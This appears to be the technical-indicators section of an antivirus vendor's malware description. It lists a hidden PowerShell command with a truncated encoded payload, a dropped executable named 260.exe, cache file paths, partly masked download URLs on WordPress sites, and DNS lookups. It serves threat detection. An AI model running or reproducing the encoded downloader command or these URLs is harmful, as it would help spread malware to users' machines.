Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABXAGIAcwB6AGMAagBpAGEAZQA9ACcARQBrAGcAbgByAHcAYwBwAHcAeAAnADsAJABZAHIAaQB1AGoAYQB4AGcAcgBvACAAPQAgACcAMgA2ADAAJwA7ACQAUQBtAG4AdABxAHQAbgBlAHQAcgA9ACcAVABvAGU...
- %HOMEPATH%\260.exe
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %HOMEPATH%\260.exe
- http://ne#.#os-sg.com/wp-content/1QIA0/
- http://ol#.#igbom.com/wp-snapshots/installer/CkYwk/
- DNS ASK ne#.#os-sg.com
- DNS ASK ol#.#igbom.com
- DNS ASK to####thuong.com
- DNS ASK sw##.#unapanda.org
- DNS ASK ge####y.hadatha.net